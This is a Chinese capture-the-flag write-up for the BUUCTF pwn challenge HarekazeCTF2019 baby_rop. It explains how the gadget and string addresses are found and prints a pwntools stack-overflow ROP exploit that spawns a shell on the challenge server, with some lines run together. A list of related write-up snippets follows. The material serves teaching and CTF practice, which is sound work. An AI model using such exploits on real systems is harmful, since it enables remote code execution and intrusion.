[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop

附件

步骤：
例行检查，64位，开启了NX保护

试运行一下程序，看这个情况，当我们输入太长字符串的时候会报错

64位ida载入，shift+f12查看程序里的字符串，看到了system 和 ‘/bin/sh’

双击跟进，ctrl+x查看一下哪里调用了字符串，没有找到函数，只找到了地址
shell=0x601048

system=0x400496

找到输入点，没有限制v4读入的数据，可以造成溢出，跟pwn16差不多，唯一的区别就是64位程序传参需要用到寄存器，我们找一下设置rdi寄存器的位置

ROPgadget --binary babyrop |grep "pop rdi"

rdi=0x400683

EXP:

from pwn import*r=remote('node3.buuoj.cn',25853)shell=0x601048
system=0x400496
rdi=0x400683payload='a'*(0x10+8)+p64(rdi)+p64(shell)+p64(system)r.sendline(payload)
r.interactive()

flag不在根目录下，需要我们找一下，利用find -name flag找一下

[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop相关推荐

BUUCTF(pwn)[HarekazeCTF2019]baby_rop
因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中 from pwn import* p = remote("node3.buuoj.cn",28711) ...
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
[BUUCTF-pwn]--[HarekazeCTF2019]baby_rop 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop 先 ...
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
[HarekazeCTF2019]baby_rop2 题目附件步骤: 例行检查,64位,开启了nx保护运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没 ...
BUUCTF(pwn)[HarekazeCTF2019]baby_rop2 泄露libc基址,rop，利用gadget
64位,开了nx保护运行了一下程序 buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为" system('/bin/sh') 利用read函数 ...
分析自动化测试收益_分析自动化测试结果
分析自动化测试收益 So, you've set up a sweet automated test framework. You're running it in your CI/CD pipeli ...
持续更新 BUUCTF——PWN（一）
文章目录前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
BUUCTF PWN 刷题 1-15题
1 rip 经典栈溢出漏洞. from pwn import *p = remote('node4.buuoj.cn', 27181)payload = b'a' * 23 + p64(0x40118 ...
buuctf（pwn）
胖胖 pwn1_sctf_2016 ciscn_2019_n_11 补充movss /ucomiss jarvisoj_level0 ciscn_2019_c_1 babyrop [第五空间2019 ...
PWN-PRACTICE-BUUCTF-5
PWN-PRACTICE-BUUCTF-5 jarvisoj_level2_x64 ciscn_2019_n_5 others_shellcode ciscn_2019_ne_5 jarvisoj_l ...

[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop

[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop

[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop相关推荐

最新文章

热门文章